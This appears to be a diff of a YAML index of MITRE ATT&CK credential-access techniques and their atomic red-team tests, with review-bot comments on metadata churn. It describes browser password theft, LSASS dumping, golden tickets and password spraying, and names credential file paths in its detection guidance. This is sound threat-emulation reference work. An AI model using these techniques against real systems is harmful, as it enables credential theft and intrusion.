- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
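Review bot: almost everything deleted in this hunk (platforms, domains, contributors, marking refs, id, created, external references; L362621-662) is re-added unchanged further down the T1555.003 entry, with the one substantive edit being the `modified` timestamp at L362663-664. A canonical key order in the generator would turn this into a one-line diff; as it stands, the reorder also moves the `GitHub Mimikittenz July 2016` reference from last (L362659-662) to first after the mitre-attack entry (L362714-717), which reviewers will have to diff by eye to confirm nothing was dropped.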
@@ -75273,6 +75999,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -75282,18 +76014,53 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests:
- name: Run Chrome-password Collector
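Review bot: the stray space in `in targeted campaign . Retrieved June 18, 2019.` (L362728) is carried over verbatim from the removed copy at L362653 and is upstream data, so do not hand-correct it in the index or the next regeneration will reintroduce it. The `x_mitre_permissions_required` removal at L362701-702 is the same field drop seen in T1558.004 and belongs in the same commit-message note.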
@@ -75832,7 +76599,7 @@ credential-access:
'
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -75869,23 +76636,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -75918,21 +76685,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -75943,7 +76709,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -75977,7 +76743,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -76005,7 +76771,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
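Review bot: the `Kaspersky Careto` URL is swapped for a web.archive.org snapshot (L362832) but the `Retrieved July 5, 2017.` line at L362830 is left unchanged, whereas the DHCP reference earlier in this patch updates the retrieved date together with the archive URL (L362786-789). Either is acceptable, but the two should be handled the same way; if the date is meant to record when the archive link was verified, update it here as well.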
@@ -76016,9 +76782,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests:
- name: Private Keys
@@ -76240,7 +77005,7 @@ credential-access:
elevation_required: true
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
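Review bot: the `modified` timestamp for T1557.001 moves backwards, from `2023-04-25T14:00:00.188Z` to `2022-10-25T15:46:55.393Z` (L362851-852), and the following hunk leaves its `x_mitre_attack_spec_version` at 3.0.0 (L362858) while every other technique in this patch is at 3.2.0. Both point to this object having been taken from an older bundle than the rest; verify the source before merging, since a consumer that uses `modified` to detect updates will treat this entry as stale.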
@@ -76348,7 +77113,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests:
- name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -76367,7 +77131,7 @@ credential-access:
elevation_required: true
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -76404,6 +77168,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -76416,7 +77181,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -76466,7 +77231,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
@@ -76953,7 +77717,7 @@ credential-access:
elevation_required: true
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -76979,6 +77743,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -76994,18 +77759,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
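Review bot: the T1110.003 platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, which matches the ATT&CK v16 platform consolidation, and the same substitution recurs below for T1528, T1606, T1621, T1552.008, T1212, T1110, T1110.004 and T1556.006. Anything keyed on the old strings (per-platform index files, generator filters, platform maps) will silently lose these techniques unless its key list is updated in the same change; please confirm the generator's platform list was updated alongside this regeneration, or add the two new names there.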
@@ -77032,9 +77797,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests:
- name: Password Spray all Domain Users
@@ -77252,7 +78014,7 @@ credential-access:
password132 \n"
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -77263,13 +78025,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -77283,6 +78045,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -77293,12 +78056,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -77373,7 +78136,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests:
- name: Cached Credential Dump via Cmdkey
@@ -77435,7 +78197,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
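Review bot: the `modified` timestamp for T1558.001 goes backwards, from `'2022-04-25T14:00:00.188Z'` to `'2020-11-05T16:07:03.779Z'`, while nearly every other technique in this diff moves forward to a 2024 date. A regressing timestamp usually means the object came from a different, older STIX bundle, or that the old `14:00:00.188Z` value was a synthetic placeholder from an earlier export rather than the real upstream value; please say which in the PR, since the same regression appears for T1556.008 further down.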
@@ -77470,8 +78232,6 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests:
- name: Crafting Active Directory golden tickets with mimikatz
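Review bot: T1558.001 loses `x_mitre_attack_spec_version: 2.1.0` outright instead of being bumped to `3.2.0` the way the neighbouring techniques are, which leaves it as the only technique in this section with no attack spec version at all. Combined with the `spec_version` removal the object now carries no version marker of either kind; if the upstream object really lacks the field, note that in the PR, otherwise this looks like a stale object being written into the index and should be regenerated.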
@@ -77637,10 +78397,10 @@ credential-access:
$env:TEMP\\golden.txt -ErrorAction Ignore\n"
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
@@ -77650,21 +78410,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
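Review bot: most of this hunk is key reordering rather than content change: `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique` and `x_mitre_version` are deleted and re-added at a different position, and the same churn recurs for T1552.003, T1552.006 and others below. The substantive edits for T1649 (`Azure AD` replaced by `Identity Provider`, `x_mitre_version` 1.1 to 1.2) are easy to miss in that noise; if the generator emitted keys in a fixed order (sorted, or the order of the previous file), regenerations would diff only on real changes and be much easier to review.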
@@ -77713,9 +78475,6 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests:
- name: Staging Local Certificates via Export-Certificate
@@ -77740,26 +78499,7 @@ credential-access:
name: powershell
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -77774,25 +78514,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
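Review bot: `x_mitre_permissions_required: [User]` is removed from T1552.003 with nothing replacing it (the same happens to T1552.006 below), so any index tooling that reads `permissions_required` needs a guard for the missing key. The citation update in the same hunk is fine: the SlideShare reference moves to the new `/slideshow/.../62021418` path and its retrieved date is bumped to match the object's `modified` date, which is the right way to record a re-fetched source.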
@@ -77866,7 +78624,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests:
- name: Extracting passwords with findstr
@@ -78061,11 +78818,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -78114,6 +78870,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -78122,6 +78879,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -78132,13 +78890,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -78194,44 +78953,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
